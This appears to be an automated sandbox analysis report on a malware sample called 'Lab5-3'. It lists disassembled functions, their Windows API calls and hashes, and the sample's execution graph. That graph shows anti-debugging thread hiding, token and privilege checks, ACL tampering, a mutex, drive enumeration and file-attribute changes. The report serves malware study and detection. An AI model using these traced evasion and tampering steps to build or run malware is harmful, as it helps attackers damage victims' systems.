                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressConsoleHandleModuleProcSleepWindow
                                                                                                            • String ID: DU$QC_^$sBUQ
                                                                                                            • API String ID: 2646531005-3283677093
                                                                                                            • Opcode ID: ebaaec3102db6426c45b52899131ca3dd398d173af1f60356e1ec69b70f0b744
                                                                                                            • Instruction ID: 8b7003d262a026946be78bd93eb04975eafada67a82ea5c44a84909ff590e3f0
                                                                                                            • Opcode Fuzzy Hash: ebaaec3102db6426c45b52899131ca3dd398d173af1f60356e1ec69b70f0b744
                                                                                                            • Instruction Fuzzy Hash: 5E21F531D04288ABDB119BB8A4487DFFFA59F2D341F0580FAE854AB241D6310644CBE9
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041917C
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041919B
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00419211
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00419230
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00419279
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00419298
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004192C9
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004192E8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                            • String ID:
                                                                                                            • API String ID: 885266447-0
                                                                                                            • Opcode ID: e79bc008e8088261fc92d9314e2ac1c6a5de38626e2c51ad0f8844eb49edcd52
                                                                                                            • Instruction ID: d7e52921a801810b29cc790a1d76ec9264f07b3f35ebdb81614f55defc82449b
                                                                                                            • Opcode Fuzzy Hash: e79bc008e8088261fc92d9314e2ac1c6a5de38626e2c51ad0f8844eb49edcd52
                                                                                                            • Instruction Fuzzy Hash: 6051EC72B001146BEB149E2DCD90B9EB796EF85710F1982BBED14EB3C4D239DC404799
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • free.MSVCRT(00000000,00000000,00000000,?,0000082C,00000000,?,000007C8), ref: 0040BA25
                                                                                                            • free.MSVCRT(00000000,00000000,00000000,?,0000082C,00000000,?,000007C8), ref: 0040BA42
                                                                                                            • free.MSVCRT(00000000,00000000,00000000,?,0000082C,00000000,?,000007C8), ref: 0040BA5F
                                                                                                            • free.MSVCRT(00000000,00000000,00000000,?,0000082C,00000000,?,000007C8), ref: 0040BA7C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: free
                                                                                                            • String ID:
                                                                                                            • API String ID: 1294909896-0
                                                                                                            • Opcode ID: eab598e14666ddf877a6fdf2126213c5001a3c770040a192eba7560c393049df
                                                                                                            • Instruction ID: 5b0149b7bfd63fee4ca4a5e410b928f2a4a60318d329b64d7720754f9b44ab75
                                                                                                            • Opcode Fuzzy Hash: eab598e14666ddf877a6fdf2126213c5001a3c770040a192eba7560c393049df
                                                                                                            • Instruction Fuzzy Hash: D7F1FAB2C002199BDB21DAA59C41BEF77BCAB44754F08013AED14B7281E77DAE4587E8
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • GdipCreateFontFamilyFromName.GDIPLUS(00411F66,00000000,?,00000000,0000000A), ref: 00401235
                                                                                                            • GdipGetGenericFontFamilySansSerif.GDIPLUS(0042840C), ref: 00401267
                                                                                                            • GdipDeleteFontFamily.GDIPLUS(00000000), ref: 00401286
                                                                                                            • GdipCreateFont.GDIPLUS(00000000,?,00000003,00000003,?), ref: 004012AD
                                                                                                            • GdipGetGenericFontFamilySansSerif.GDIPLUS(0042840C,?,00000003,00000003,?), ref: 004012CF
                                                                                                            • GdipCreateFont.GDIPLUS(?,?,00000003,00000003,?,?,00000003,00000003,?), ref: 004012FB
                                                                                                            • GdipDeleteFontFamily.GDIPLUS(00000000,?,00000003,00000003,?), ref: 00401303
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FontGdip$Family$Create$DeleteGenericSansSerif$FromName
                                                                                                            • String ID:
                                                                                                            • API String ID: 2831291859-0
                                                                                                            • Opcode ID: c29700c167b35fe2613740b7fefed36274ea8ef3cbdc742ec9301415fed3456c
                                                                                                            • Instruction ID: d62b181d2a8f830cb4f77dd6fef2682e66a6f27958cf8952eab393085cc44b25
                                                                                                            • Opcode Fuzzy Hash: c29700c167b35fe2613740b7fefed36274ea8ef3cbdc742ec9301415fed3456c
                                                                                                            • Instruction Fuzzy Hash: B0316D74B02205ABD720DF69ED44B5EBBF8EF45700F50C1AEE805A72A1EB70D9018B98
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • FindFirstVolumeW.KERNEL32(?,00000104), ref: 004174E8
                                                                                                            • QueryDosDeviceW.KERNEL32(?,?,00000104), ref: 0041757A
                                                                                                            • FindNextVolumeW.KERNEL32(00000000,?,00000104), ref: 004175A9
                                                                                                            • FindVolumeClose.KERNEL32(00000000), ref: 004175B4
                                                                                                            • ExitThread.KERNEL32 ref: 004175BC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FindVolume$CloseDeviceExitFirstNextQueryThread
                                                                                                            • String ID: ?
                                                                                                            • API String ID: 9496724-1684325040
                                                                                                            • Opcode ID: 32b5c1e35a10caa76a4138edc3ff6a14eb70fe0d5499fd002f8ba94530bc533d
                                                                                                            • Instruction ID: a959f1489e723b3308e5144693ff93d7ce13e0ea6e19a8b9aa47c41488bd1cd1
                                                                                                            • Opcode Fuzzy Hash: 32b5c1e35a10caa76a4138edc3ff6a14eb70fe0d5499fd002f8ba94530bc533d
                                                                                                            • Instruction Fuzzy Hash: DC219674904318EADF20EB60DC48BFB737AEB54314F0081B6D62893592EB745EC48BAC
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 10698a7a5d1eecf074f830d51d509fe6a8dd5a28560181e029d9c61549755b90
                                                                                                            • Instruction ID: ec4c4120b6eb0a779cb780738938500450c85f9a331ead1921b4d311e952b877
                                                                                                            • Opcode Fuzzy Hash: 10698a7a5d1eecf074f830d51d509fe6a8dd5a28560181e029d9c61549755b90
                                                                                                            • Instruction Fuzzy Hash: B5025C72D402199BCB20DFE5DC85AAFB7B8AF54314F05017AEC04BB382E739AD158B95
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • OpenProcessToken.ADVAPI32(000000FF,00000008,?,00000000), ref: 004177A3
                                                                                                            • GetTokenInformation.ADVAPI32(?,00000012(TokenIntegrityLevel),?,00000004,?), ref: 004177C9
                                                                                                            • GetTokenInformation.ADVAPI32(?,00000013(TokenIntegrityLevel),?,00000004,?), ref: 004177E8
                                                                                                            • GetTokenInformation.ADVAPI32(?,0000000A(TokenIntegrityLevel),?,00000038,?), ref: 00417800
                                                                                                            • CloseHandle.KERNEL32(00000002), ref: 00417808
                                                                                                              • Part of subcall function 004175D0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004175E4
                                                                                                              • Part of subcall function 004175D0: Process32First.KERNEL32(00000000,00000128), ref: 0041761F
                                                                                                              • Part of subcall function 004175D0: OpenProcess.KERNEL32(00001000,00000000,?), ref: 00417640
                                                                                                              • Part of subcall function 004175D0: OpenProcessToken.ADVAPI32(00000000,0000000A,00000002), ref: 00417653
                                                                                                              • Part of subcall function 004175D0: GetTokenInformation.ADVAPI32(00000002,0000000A(TokenIntegrityLevel),?,00000038,?), ref: 0041766C
                                                                                                              • Part of subcall function 004175D0: DuplicateToken.ADVAPI32(00000002,00000002,?), ref: 00417696
                                                                                                              • Part of subcall function 004175D0: SetThreadToken.ADVAPI32(00000000,?), ref: 004176A5
                                                                                                              • Part of subcall function 004175D0: CloseHandle.KERNEL32(?), ref: 004176B1
                                                                                                              • Part of subcall function 004175D0: CloseHandle.KERNEL32(00000002), ref: 004176B6
                                                                                                              • Part of subcall function 004175D0: CloseHandle.KERNEL32(00000000), ref: 004176B9
                                                                                                              • Part of subcall function 004175D0: Process32Next.KERNEL32(00000000,00000128), ref: 004176C9
                                                                                                              • Part of subcall function 004175D0: CloseHandle.KERNEL32(00000000), ref: 004176DB
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00417831
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Token$CloseHandle$Information$OpenProcess$Process32$CreateDuplicateFirstNextSnapshotThreadToolhelp32
                                                                                                            • String ID:
                                                                                                            • API String ID: 2284909500-0
                                                                                                            • Opcode ID: d36781a76d016ade7ec61e25fa5d16699151caae10c2ec791486d6a3ebac7b08
                                                                                                            • Instruction ID: bb76c81c99f9f6c75eb351999650ff105598f7ca62c4df14ebc6082fc51888b3
                                                                                                            • Opcode Fuzzy Hash: d36781a76d016ade7ec61e25fa5d16699151caae10c2ec791486d6a3ebac7b08
                                                                                                            • Instruction Fuzzy Hash: 13116371508305BEE620EF50DD05EAB7BECEB44761F008526BA64C61E0E730DD59DBE6
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: EncodersGdipImageSizemalloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 1854992867-0
                                                                                                            • Opcode ID: f6c60024073f4cb57e0f8f2bde4f8bba52051608b4d6e0bfcd50a0ce47c877b0
                                                                                                            • Instruction ID: 3e6433f94f1ed34bbcdba926ff14b45bf1ffff61e29cb2b3a4b9016ddf6f4980
                                                                                                            • Opcode Fuzzy Hash: f6c60024073f4cb57e0f8f2bde4f8bba52051608b4d6e0bfcd50a0ce47c877b0
                                                                                                            • Instruction Fuzzy Hash: 1421F671E001089BDB109F98DD455EFB779FF24325F1042A2EC19D7360E7769AA4C794
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • OpenMutexA.KERNEL32(00000000,00000000,00000000), ref: 004128F8
                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00412905
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Mutex$CreateOpen
                                                                                                            • String ID: g^$sM
                                                                                                            • API String ID: 4030545807-4124696053
                                                                                                            • Opcode ID: 5d216a052c4bb22f2b4fbe9b591bea8ecd66a3b6c7a2ce6433abb047d94da898
                                                                                                            • Instruction ID: 0f3efbeef4f09248e61212af30985377b4f0e49588f48f69a01edcf33dd71253
                                                                                                            • Opcode Fuzzy Hash: 5d216a052c4bb22f2b4fbe9b591bea8ecd66a3b6c7a2ce6433abb047d94da898
                                                                                                            • Instruction Fuzzy Hash: F611D030D0828CA6EB209FA8D9027EDB774EF1534AF008258FC0476161E7B12695C795
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • calloc.MSVCRT ref: 00409B34
                                                                                                            • free.MSVCRT(0C458D36,0C458D36,75F6850C,00000000,0C458D36,75F6850C,00408710,?,?,?,?,?,?,?,0000082C,00000000), ref: 00409B70
                                                                                                            • calloc.MSVCRT ref: 00409C00
                                                                                                            • free.MSVCRT(FE811075,FE811075,8B5640EC,00000000,FE811075,8B5640EC,00408710,?,?,?,?,?,?,?,0000082C,00000000), ref: 00409C35
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: callocfree
                                                                                                            • String ID:
                                                                                                            • API String ID: 306872129-0
                                                                                                            • Opcode ID: 63ef44e5ed586233472db434db08776c7465e02aede6e1a2226a25e678bf8e7f
                                                                                                            • Instruction ID: 01c36718760dd56b792d81238327108a8745c82dc47bdabbc46a0d59caf1ca76
                                                                                                            • Opcode Fuzzy Hash: 63ef44e5ed586233472db434db08776c7465e02aede6e1a2226a25e678bf8e7f
                                                                                                            • Instruction Fuzzy Hash: F951A031A046159FDB20CF19C880A6AB3E5FF85324B44C53EE81AAB395D738FD41CB94
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • calloc.MSVCRT ref: 0040BFEA
                                                                                                            • free.MSVCRT(?,?,?,00000000,?,?,00000000,-00000002), ref: 0040C02A
                                                                                                            • free.MSVCRT(00000000,00000000,00000000,-00000002), ref: 0040C0B1
                                                                                                            • free.MSVCRT(00000000,00000000,00000000,-00000002), ref: 0040C0CE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: free$calloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 3095843317-0
                                                                                                            • Opcode ID: cf23a1f14060f60578dd7ed33210d9ae3dfd19c6f66ec5dab5b98a0053720786
                                                                                                            • Instruction ID: fccfa55ca9b783b55a79462ee8e33f13877072596b08b627f75ceb8fed52c50e
                                                                                                            • Opcode Fuzzy Hash: cf23a1f14060f60578dd7ed33210d9ae3dfd19c6f66ec5dab5b98a0053720786
                                                                                                            • Instruction Fuzzy Hash: 7D516F7190021ADBDB20DF94C881AAFB7B8EF04314F14417AED14AB392D779EE45CB98
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:31.1%
                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:1395
                                                                                                            Total number of Limit Nodes:43
                                                                                                            execution_graph 5738 40ed70 5739 412920 6 API calls 5738->5739 5740 40ed8a 5739->5740 5760 401120 GdipDeleteBrush 5761 40113c 5760->5761 5763 40114e 5760->5763 5762 401140 GdipFree 5761->5762 5761->5763 5768 4010c0 GdipCloneBrush 5769 4010e2 GdipAlloc 5768->5769 5770 4010df 5768->5770 5771 401105 GdipDeleteBrush 5769->5771 5772 4010ee 5769->5772 5770->5769 5773 40f980 5780 401000 5773->5780 5775 40f9ea GetModuleHandleA GetProcAddress 5776 40fa06 5775->5776 5777 40fa14 5775->5777 5776->5777 5778 40fa30 Sleep 5776->5778 5779 40fa25 GetConsoleWindow 5776->5779 5779->5778 5781 401010 5780->5781 5781->5775 5781->5781 4283 416e10 GetPEB 4284 416e30 4283->4284 4285 416e28 ExitProcess 4283->4285 4362 416990 GetSystemDefaultUILanguage 4284->4362 4290 416e72 Sleep 4382 41aa00 GetCurrentProcess OpenProcessToken 4290->4382 4291 416e69 NtSetInformationThread 4291->4290 4297 416f22 4299 416f26 ExitProcess 4297->4299 4300 416f2e 4297->4300 4298 416e9b GetVersion 4302 416ea5 GetPEB 4298->4302 4306 416efa 4298->4306 4418 416b00 4300->4418 4318 416ebf 4302->4318 4303 416f35 NtOpenProcess 4304 416fa3 4303->4304 4305 4170bd 4303->4305 4308 4170cb 4304->4308 4309 416fae GetSecurityInfo 4304->4309 4307 4170c4 NtClose 4305->4307 4305->4308 4399 40f630 4306->4399 4307->4308 4310 4170d2 RtlFreeSid 4308->4310 4311 4170d9 NtSetInformationProcess RtlAdjustPrivilege GetCurrentProcess OpenProcessToken 4308->4311 4309->4305 4312 416fcd RtlAllocateAndInitializeSid 4309->4312 4310->4311 4314 41711c GetTokenInformation 4311->4314 4315 41713e 4311->4315 4312->4305 4316 416ff5 RtlQueryInformationAcl RtlLengthSid malloc 4312->4316 4314->4315 4321 417145 CloseHandle 4315->4321 4322 41714c CreateThread 4315->4322 4319 4170b7 4316->4319 4320 41702c RtlCreateAcl 4316->4320 4317 416f1a 4413 412870 4317->4413 4472 41a8e0 NtAllocateVirtualMemory 4318->4472 4319->4305 4324 4170a7 free 4320->4324 4325 41703a RtlAddAccessDeniedAce 4320->4325 4321->4322 4326 417164 NtSetInformationThread 4322->4326 4327 41716d 4322->4327 5679 4174d0 FindFirstVolumeW 4322->5679 4324->4319 4325->4324 4329 41704c 4325->4329 4326->4327 4330 417171 CreateThread 4327->4330 4331 417196 4327->4331 4328 416ee7 4478 41a740 CoInitializeEx 4328->4478 4333 417093 SetSecurityInfo 4329->4333 4337 417060 RtlGetAce 4329->4337 4330->4331 4334 41718b NtSetInformationThread 4330->4334 4433 419330 4331->4433 4333->4324 4334->4331 4337->4324 4339 417075 RtlAddAce 4337->4339 4338 41719e 4340 4171c9 GetTickCount 4338->4340 4343 4171a2 4338->4343 4339->4324 4339->4329 4452 40fe80 RtlInitializeCriticalSection CreateThread 4340->4452 4345 40f630 14 API calls 4343->4345 4344 417243 4346 40f630 14 API calls 4344->4346 4347 4171be ExitProcess 4345->4347 4348 417249 4346->4348 4486 411e40 GdiplusStartup 4348->4486 4350 417280 4527 411a80 4350->4527 4352 417285 4353 416b00 23 API calls 4352->4353 4354 41728f GetConsoleWindow IsWindowVisible 4353->4354 4355 4172d1 NtWaitForSingleObject 4354->4355 4358 4172a0 4354->4358 4543 416ce0 GetPEB 4355->4543 4357 4172e1 ExitProcess 4359 40f630 14 API calls 4358->4359 4360 4172c4 4359->4360 4542 412590 Sleep 4360->4542 4363 416ae9 ExitProcess 4362->4363 4364 4169aa 4362->4364 4364->4363 4365 416a60 GetUserDefaultUILanguage 4364->4365 4365->4363 4366 416a6e 4365->4366 4366->4363 4367 416af1 RtlInitializeCriticalSection 4366->4367 4368 40fdb0 GetPEB CommandLineToArgvW 4367->4368 4369 40fde6 CreateThread 4368->4369 4370 40fdef 4368->4370 4369->4290 4369->4291 5686 40f800 AllocConsole GetConsoleWindow ShowWindow 4369->5686 4371 419330 111 API calls 4370->4371 4372 40fdf4 4371->4372 4373 40fdf8 ExitProcess 4372->4373 4374 40fdff 4372->4374 4375 40fe5b 4374->4375 4377 40fe16 GetFileAttributesW 4374->4377 4380 40fe3a SetFileAttributesW 4374->4380 4548 410530 wsprintfW FindFirstFileExW 4374->4548 4638 419500 PathFindExtensionW 4374->4638 4376 40fe61 Sleep 4375->4376 4376->4376 4378 40fe6e ExitProcess 4376->4378 4377->4374 4380->4374 4383 41aa23 GetTokenInformation 4382->4383 4384 41aa45 4382->4384 4383->4384 4385 416e82 4384->4385 4386 41aa4c FindCloseChangeNotification 4384->4386 4385->4317 4387 412680 NtOpenProcessToken 4385->4387 4386->4385 4388 4126d9 CreateWellKnownSid 4387->4388 4389 4126bc 4387->4389 4388->4389 4390 4126f6 CheckTokenMembership 4388->4390 4391 412780 CloseHandle 4389->4391 4392 412783 4389->4392 4390->4389 4393 41270a 4390->4393 4391->4392 4394 41278a CloseHandle 4392->4394 4395 41278d 4392->4395 4393->4389 4396 41270f NtQueryInformationToken 4393->4396 4394->4395 4395->4298 4395->4306 4397 412728 4396->4397 4398 41274f CheckTokenMembership 4396->4398 4397->4389 4398->4389 4398->4397 4401 40f656 4399->4401 4400 40f66d wvsprintfA wsprintfA GetLocalTime 4402 40f6f0 4400->4402 4401->4400 4401->4401 4402->4402 4403 40f6fd wsprintfA 4402->4403 4404 40f733 GetPEB RtlEnterCriticalSection SetConsoleTextAttribute 4403->4404 4405 40f725 4403->4405 4407 40f76b WriteFile SetConsoleTextAttribute 4404->4407 4408 40f75f 4404->4408 4405->4404 4406 40f7e8 4405->4406 4406->4317 4409 40f7ab WriteFile GetConsoleWindow IsWindowVisible 4407->4409 4410 40f79b 4407->4410 4408->4407 4411 40f7d4 FlashWindow 4409->4411 4412 40f7dd RtlLeaveCriticalSection 4409->4412 4410->4409 4410->4410 4411->4412 4412->4406 4414 4128b4 4413->4414 4415 4128f1 OpenMutexA 4414->4415 4416 412912 4415->4416 4417 412902 CreateMutexA 4415->4417 4416->4297 4417->4297 4737 401370 4418->4737 4420 416b53 RegCreateKeyExA 4421 416cd5 4420->4421 4422 416b7c 4420->4422 4421->4303 4423 416bf2 GetPEB 4422->4423 4424 416b98 RegDeleteValueW 4422->4424 4739 401400 4423->4739 4425 416bc0 4424->4425 4425->4425 4428 40f630 14 API calls 4425->4428 4427 416c5f wsprintfW RegQueryValueExW 4429 416c91 lstrcmpiW 4427->4429 4430 416cae RegSetValueExW 4427->4430 4431 416bda RegCloseKey 4428->4431 4429->4430 4432 416ccc RegCloseKey 4429->4432 4430->4432 4431->4303 4432->4421 4436 419341 4433->4436 4434 41938d 4740 418620 malloc 4434->4740 4436->4434 4436->4436 4438 40f630 14 API calls 4436->4438 4437 41939f 4439 4193a3 4437->4439 4440 4193aa GetPEB NtCreateIoCompletion 4437->4440 4438->4434 4439->4338 4441 4193f0 4440->4441 4441->4441 4442 40f630 14 API calls 4441->4442 4443 41940d 4442->4443 4444 4194bb 4443->4444 4445 419430 CreateThread 4443->4445 4448 40f630 14 API calls 4444->4448 4446 419454 CreateThread 4445->4446 4447 41944b NtSetInformationThread 4445->4447 5463 4180b0 68 API calls __allrem 4445->5463 4449 419478 NtSetInformationThread NtSetInformationThread 4446->4449 4450 41946f NtSetInformationThread 4446->4450 5450 4180b0 4446->5450 4447->4446 4451 4194ee 4448->4451 4449->4444 4449->4445 4450->4449 4451->4338 4453 40fec3 CreateThread 4452->4453 4454 40feba NtSetInformationThread 4452->4454 5503 41a450 WSAStartup 4452->5503 4455 40fef0 NtSetInformationThread 4453->4455 4456 40fef9 CreateThread 4453->4456 5498 40fab0 4453->5498 4454->4453 4455->4456 4457 40ff26 NtSetInformationThread 4456->4457 4458 40ff2f GetLogicalDrives 4456->4458 5490 40fa70 4456->5490 4457->4458 4459 40ff62 4458->4459 4460 40ff6f GetDriveTypeW 4459->4460 4461 40ff8c malloc 4459->4461 4462 410092 Sleep WaitForMultipleObjects 4459->4462 4460->4459 4460->4461 4461->4459 4463 40ffa1 wsprintfW CreateThread 4461->4463 4464 4100d3 4462->4464 4463->4459 4465 410065 NtSetInformationThread 4463->4465 5470 410170 RtlEnterCriticalSection 4463->5470 4464->4464 4466 40f630 14 API calls 4464->4466 4465->4459 4467 4100ed 4466->4467 4468 4100f0 Sleep 4467->4468 4469 410106 RtlDeleteCriticalSection 4467->4469 4468->4467 4468->4468 4470 40f630 14 API calls 4469->4470 4471 410158 GetTickCount 4470->4471 4471->4344 4473 41a9a0 RtlAcquirePebLock 4472->4473 4474 41a924 GetWindowsDirectoryW 4472->4474 4475 41a9b8 4473->4475 4477 41a942 4474->4477 4476 41a9bf RtlInitUnicodeString RtlInitUnicodeString RtlReleasePebLock LdrEnumerateLoadedModules 4475->4476 4476->4328 4477->4473 4479 41a776 